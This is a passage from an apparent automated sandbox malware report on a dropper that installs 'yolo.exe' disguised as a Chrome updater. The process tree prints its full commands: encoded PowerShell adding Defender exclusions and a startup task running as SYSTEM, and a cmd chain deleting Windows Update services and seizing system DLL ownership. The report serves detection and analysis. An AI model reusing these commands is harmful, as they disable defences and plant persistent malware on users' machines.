Token: 35	2188	powershell.exe
Token: 36	2188	powershell.exe
Token: SeIncreaseQuotaPrivilege	2188	powershell.exe
Token: SeSecurityPrivilege	2188	powershell.exe
Token: SeTakeOwnershipPrivilege	2188	powershell.exe
Token: SeLoadDriverPrivilege	2188	powershell.exe
Token: SeSystemProfilePrivilege	2188	powershell.exe
Token: SeSystemtimePrivilege	2188	powershell.exe
Token: SeProfSingleProcessPrivilege	2188	powershell.exe
Token: SeIncBasePriorityPrivilege	2188	powershell.exe
Token: SeCreatePagefilePrivilege	2188	powershell.exe
Token: SeBackupPrivilege	2188	powershell.exe
Token: SeRestorePrivilege	2188	powershell.exe
Token: SeShutdownPrivilege	2188	powershell.exe
Token: SeDebugPrivilege	2188	powershell.exe
Token: SeSystemEnvironmentPrivilege	2188	powershell.exe
Token: SeRemoteShutdownPrivilege	2188	powershell.exe
Token: SeUndockPrivilege	2188	powershell.exe
Token: SeManageVolumePrivilege	2188	powershell.exe
Token: 33	2188	powershell.exe
Token: 34	2188	powershell.exe
Token: 35	2188	powershell.exe
Token: 36	2188	powershell.exe
Token: SeIncreaseQuotaPrivilege	2188	powershell.exe
Token: SeSecurityPrivilege	2188	powershell.exe
Token: SeTakeOwnershipPrivilege	2188	powershell.exe
Token: SeLoadDriverPrivilege	2188	powershell.exe
Token: SeSystemProfilePrivilege	2188	powershell.exe
Token: SeSystemtimePrivilege	2188	powershell.exe
Token: SeProfSingleProcessPrivilege	2188	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3736	UnamDownloader.exe
3736	UnamDownloader.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4600 wrote to memory of 3560	4600	Malware_Dropper.exe	83
PID 4600 wrote to memory of 3560	4600	Malware_Dropper.exe	83
PID 4600 wrote to memory of 3560	4600	Malware_Dropper.exe	83
PID 4600 wrote to memory of 3560	4600	Malware_Dropper.exe	83
PID 4600 wrote to memory of 3560	4600	Malware_Dropper.exe	83
PID 4600 wrote to memory of 3560	4600	Malware_Dropper.exe	83
PID 4600 wrote to memory of 3560	4600	Malware_Dropper.exe	83
PID 4600 wrote to memory of 3560	4600	Malware_Dropper.exe	83
PID 4600 wrote to memory of 3560	4600	Malware_Dropper.exe	83
PID 4600 wrote to memory of 3560	4600	Malware_Dropper.exe	83
PID 4600 wrote to memory of 5052	4600	Malware_Dropper.exe	84
PID 4600 wrote to memory of 5052	4600	Malware_Dropper.exe	84
PID 4600 wrote to memory of 3736	4600	Malware_Dropper.exe	85
PID 4600 wrote to memory of 3736	4600	Malware_Dropper.exe	85
PID 5052 wrote to memory of 1072	5052	yolo.exe	87
PID 5052 wrote to memory of 1072	5052	yolo.exe	87
PID 5052 wrote to memory of 2996	5052	yolo.exe	90
PID 5052 wrote to memory of 2996	5052	yolo.exe	90
PID 5052 wrote to memory of 872	5052	yolo.exe	92
PID 5052 wrote to memory of 872	5052	yolo.exe	92
PID 2996 wrote to memory of 4904	2996	cmd.exe	94
PID 2996 wrote to memory of 4904	2996	cmd.exe	94
PID 2996 wrote to memory of 3128	2996	cmd.exe	95
PID 2996 wrote to memory of 3128	2996	cmd.exe	95
PID 872 wrote to memory of 1608	872	cmd.exe	96
PID 872 wrote to memory of 1608	872	cmd.exe	96
PID 2996 wrote to memory of 2620	2996	cmd.exe	97
PID 2996 wrote to memory of 2620	2996	cmd.exe	97
PID 872 wrote to memory of 3376	872	cmd.exe	98
PID 872 wrote to memory of 3376	872	cmd.exe	98
PID 2996 wrote to memory of 4432	2996	cmd.exe	99
PID 2996 wrote to memory of 4432	2996	cmd.exe	99
PID 872 wrote to memory of 4876	872	cmd.exe	100
PID 872 wrote to memory of 4876	872	cmd.exe	100
PID 2996 wrote to memory of 448	2996	cmd.exe	101
PID 2996 wrote to memory of 448	2996	cmd.exe	101
PID 872 wrote to memory of 4720	872	cmd.exe	102
PID 872 wrote to memory of 4720	872	cmd.exe	102
PID 2996 wrote to memory of 2008	2996	cmd.exe	103
PID 2996 wrote to memory of 2008	2996	cmd.exe	103
PID 2996 wrote to memory of 4612	2996	cmd.exe	104
PID 2996 wrote to memory of 4612	2996	cmd.exe	104
PID 2996 wrote to memory of 5056	2996	cmd.exe	106
PID 2996 wrote to memory of 5056	2996	cmd.exe	106
PID 2996 wrote to memory of 736	2996	cmd.exe	105
PID 2996 wrote to memory of 736	2996	cmd.exe	105
PID 2996 wrote to memory of 5060	2996	cmd.exe	107
PID 2996 wrote to memory of 5060	2996	cmd.exe	107
PID 2996 wrote to memory of 3416	2996	cmd.exe	108
PID 2996 wrote to memory of 3416	2996	cmd.exe	108
PID 2996 wrote to memory of 5036	2996	cmd.exe	109
PID 2996 wrote to memory of 5036	2996	cmd.exe	109
PID 5052 wrote to memory of 2188	5052	yolo.exe	110
PID 5052 wrote to memory of 2188	5052	yolo.exe	110
PID 2996 wrote to memory of 3016	2996	cmd.exe	112
PID 2996 wrote to memory of 3016	2996	cmd.exe	112
PID 2996 wrote to memory of 1636	2996	cmd.exe	113
PID 2996 wrote to memory of 1636	2996	cmd.exe	113
PID 2996 wrote to memory of 3464	2996	cmd.exe	114
PID 2996 wrote to memory of 3464	2996	cmd.exe	114
PID 2996 wrote to memory of 3936	2996	cmd.exe	115
PID 2996 wrote to memory of 3936	2996	cmd.exe	115
PID 2996 wrote to memory of 3316	2996	cmd.exe	116
PID 2996 wrote to memory of 3316	2996	cmd.exe	116

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3152
- C:\Users\Admin\AppData\Local\Temp\Malware_Dropper.exe
  "C:\Users\Admin\AppData\Local\Temp\Malware_Dropper.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Checks computer location settings
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4600
- - C:\Users\Admin\AppData\Local\Temp\yolo.exe
    "C:\Users\Admin\AppData\Local\Temp\yolo.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Checks computer location settings
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5052
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAegAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAdQBhACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAeABrACMAPgA="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1072
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2996
    - - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:4904
    - - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:3128
    - - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:2620
    - - C:\Windows\system32\sc.exe
        
        sc stop bits
        5⤵
        Launches sc.exe
        
        PID:4432
    - - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        5⤵
        Launches sc.exe
        
        PID:448
    - - C:\Windows\system32\reg.exe
        
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
        5⤵
        Modifies registry key
        
        PID:2008
    - - C:\Windows\system32\reg.exe
        
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
        5⤵
        Modifies registry key
        
        PID:4612
    - - C:\Windows\system32\reg.exe
        
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
        5⤵
        Modifies registry key
        
        PID:736
    - - C:\Windows\system32\reg.exe
        
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
        5⤵
        Modifies security service
        Modifies registry key
        
        PID:5056
    - - C:\Windows\system32\reg.exe
        
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
        5⤵
        Modifies registry key
        
        PID:5060
    - - C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\System32\WaaSMedicSvc.dll
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:3416
    - - C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5036
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
        5⤵
        Modifies registry key
        
        PID:3016
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        5⤵
        Modifies registry key
        
        PID:1636
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        5⤵
        Modifies registry key
        
        PID:3464
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        5⤵
        Modifies registry key
        
        PID:3936
    - - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
        5⤵
        
        PID:3316
    - - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
        5⤵
        
        PID:852
    - - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
        5⤵
        
        PID:3320
    - - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
        5⤵
        
        PID:2776
    - - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
        5⤵
        
        PID:3168
    - - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
        5⤵
        
        PID:2172
    - - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        5⤵
        
        PID:4376
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      4⤵
      Suspicious use of WriteProcessMemory
      PID:872
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1608
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3376
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4876
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4720
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdABtACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAJwAgAC0AQQByAGcAdQBtAGUAbgB0ACAAJwAtAEUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgACIAUABBAEEAagBBAEgAUQBBAFkAdwBCAGgAQQBDAE0AQQBQAGcAQQBnAEEARgBNAEEAZABBAEIAaABBAEgASQBBAGQAQQBBAHQAQQBGAEEAQQBjAGcAQgB2AEEARwBNAEEAWgBRAEIAegBBAEgATQBBAEkAQQBBAHQAQQBFAFkAQQBhAFEAQgBzAEEARwBVAEEAVQBBAEIAaABBAEgAUQBBAGEAQQBBAGcAQQBDAGMAQQBRAHcAQQA2AEEARgB3AEEAVQBBAEIAeQBBAEcAOABBAFoAdwBCAHkAQQBHAEUAQQBiAFEAQQBnAEEARQBZAEEAYQBRAEIAcwBBAEcAVQBBAGMAdwBCAGMAQQBFAGMAQQBiAHcAQgB2AEEARwBjAEEAYgBBAEIAbABBAEYAdwBBAFEAdwBCAG8AQQBIAEkAQQBiAHcAQgB0AEEARwBVAEEAWABBAEIAMQBBAEgAQQBBAFoAQQBCAGgAQQBIAFEAQQBaAFEAQgB5AEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAGcAQQBDADAAQQBWAGcAQgBsAEEASABJAEEAWQBnAEEAZwBBAEYASQBBAGQAUQBCAHUAQQBFAEUAQQBjAHcAQQBnAEEARAB3AEEASQB3AEIAagBBAEcAWQBBAFoAUQBCAHMAQQBDAE0AQQBQAGcAQQA9ACIAJwApACAAPAAjAHAAbgAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQAUwB0AGEAcgB0AHUAcAApACAAPAAjAGgAeAAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGsAdABxAHIAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwB3AHMAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAB5AG8AbABvAC4AZQB4AGUAJwAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIALgBlAHgAZQAnACAALQBGAG8AcgBjAGUAIAA8ACMAaQB2AGsAeQAjAD4AOwAgAFMAdABhAHIAdAAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAA8ACMAbgB3AGgAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="
      4⤵
      Drops file in Program Files directory
      Suspicious use of AdjustPrivilegeToken
      PID:2188
- - C:\Users\Admin\AppData\Local\Temp\UnamDownloader.exe
    "C:\Users\Admin\AppData\Local\Temp\UnamDownloader.exe"
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    PID:3736
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:3136
- C:\Users\Admin\AppData\Local\Temp\Malware_Dropper.exe
  "C:\Users\Admin\AppData\Local\Temp\Malware_Dropper.exe"
  2⤵
  PID:3560

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHQAYwBhACMAPgAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwAgADwAIwBjAGYAZQBsACMAPgA="
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4384
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  PID:2368
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAegAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAdQBhACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAeABrACMAPgA="
    3⤵
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    PID:4604

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe

Filesize
4.1MB

MD5
990a78c9a169695677130e6f6aaf4ee4

SHA1
d35296a37417a8ae77989aa2728879e79fd89ebf

SHA256
14fe55ffc40ffb9393f11ae5d78a2a025b66c14593cd9168ee759bd0bb82fdd5

SHA512
0f8495b979171e878b587c59990fee41a9a3e3a4a816ae3ea84bcb203ea7f01d41478eb3acfd571f6147c411e3e6295dea093d37bc763aefe1dec54f7a223b40

Download Submit
C:\Program Files\Google\Chrome\updater.exe

Filesize
4.1MB

MD5
990a78c9a169695677130e6f6aaf4ee4

SHA1
d35296a37417a8ae77989aa2728879e79fd89ebf

SHA256
14fe55ffc40ffb9393f11ae5d78a2a025b66c14593cd9168ee759bd0bb82fdd5

SHA512
0f8495b979171e878b587c59990fee41a9a3e3a4a816ae3ea84bcb203ea7f01d41478eb3acfd571f6147c411e3e6295dea093d37bc763aefe1dec54f7a223b40

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

Filesize
28KB

MD5
e5dce501081f9acf5bbb7e6319ed679e

SHA1
83d137d561d203bc8db7dfcc72a9df22b333ea8d

SHA256
ff0e1f1545a4d85d57494358c08c2fbfce9c21fc3de072e5be2521f7261a30c2

SHA512
3d0ca3aaf23787356f0fe039bd916b69ded42e588db82c1a491f212022e15c505553e8739a0f480a9d44f0fcc5b1e6b9412510c04fd58a6dfc27cd894fa20723

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e907f77659a6601fcc408274894da2e

SHA1
9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

SHA256
385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

SHA512
34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

Download Submit
C:\Users\Admin\AppData\Local\Temp\UnamDownloader.exe

Filesize
9.4MB

MD5
d506f597b337bb21d0be9638873e1cae

SHA1
cf43f7ebe1e2bfeada1d04edee631cfc05eaf9bf

SHA256
729ef000683d0903141c1031fb3eeed340a4635a3f0b489d0df396d5065a36e0

SHA512
fc833c5a7fce6b577336948e9ddaceac41a4543311de50d79d7edd00bc318c1eba4ad5951fcccd26cfc0fa990ab81a30178d4b2a2968f4a7960a6b73cea2d353

Download Submit
C:\Users\Admin\AppData\Local\Temp\UnamDownloader.exe

Filesize
9.4MB

MD5
d506f597b337bb21d0be9638873e1cae

SHA1
cf43f7ebe1e2bfeada1d04edee631cfc05eaf9bf

SHA256
729ef000683d0903141c1031fb3eeed340a4635a3f0b489d0df396d5065a36e0

SHA512
fc833c5a7fce6b577336948e9ddaceac41a4543311de50d79d7edd00bc318c1eba4ad5951fcccd26cfc0fa990ab81a30178d4b2a2968f4a7960a6b73cea2d353

Download Submit
C:\Users\Admin\AppData\Local\Temp\yolo.exe

Filesize
4.1MB

MD5
990a78c9a169695677130e6f6aaf4ee4

SHA1
d35296a37417a8ae77989aa2728879e79fd89ebf

SHA256
14fe55ffc40ffb9393f11ae5d78a2a025b66c14593cd9168ee759bd0bb82fdd5

SHA512
0f8495b979171e878b587c59990fee41a9a3e3a4a816ae3ea84bcb203ea7f01d41478eb3acfd571f6147c411e3e6295dea093d37bc763aefe1dec54f7a223b40

Download Submit
C:\Users\Admin\AppData\Local\Temp\yolo.exe

Filesize
4.1MB

MD5
990a78c9a169695677130e6f6aaf4ee4

SHA1
d35296a37417a8ae77989aa2728879e79fd89ebf

SHA256
14fe55ffc40ffb9393f11ae5d78a2a025b66c14593cd9168ee759bd0bb82fdd5

SHA512
0f8495b979171e878b587c59990fee41a9a3e3a4a816ae3ea84bcb203ea7f01d41478eb3acfd571f6147c411e3e6295dea093d37bc763aefe1dec54f7a223b40

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
